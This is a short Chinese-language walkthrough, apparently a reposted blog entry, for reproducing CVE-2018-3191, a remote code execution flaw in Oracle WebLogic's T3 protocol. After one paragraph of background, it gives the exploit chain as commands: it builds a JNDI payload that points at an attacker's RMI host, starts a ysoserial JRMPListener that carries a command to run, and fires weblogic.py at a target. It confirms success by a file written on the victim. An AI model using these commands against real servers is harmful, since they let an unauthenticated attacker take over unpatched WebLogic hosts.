1. 程式人生 > >CVE-2018-3191遠端程式碼命令執行漏洞

CVE-2018-3191遠端程式碼命令執行漏洞

0x00 weblogic漏洞簡介

北京時間10月17日,Oracle官方釋出的10月關鍵補丁更新CPU(Critical Patch Update)中修復了一個高危的WebLogic遠端程式碼執行漏洞(CVE-2018-3191)。該漏洞允許未經身份驗證的攻擊者通過T3協議網路訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致WebLogic Server被攻擊者接管,從而造成遠端程式碼執行。這個漏洞由Matthias Kaiser,loopx9,Li Zhengdong申報。

0x01復現準備

首先準備payload

java -jar weblogic-spring-jndi.jar rmi://攻擊端ip:埠/Exp > payload.txt

然後搭建rmi伺服器端

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 埠 CommonsCollections1 "要執行的指令"

0x02 復現

Python weblogic.py target_ip target_port payload.txt

此時rmi伺服器那邊能看到有連線

0x03 驗證結果

此時可以看到1.txt寫入了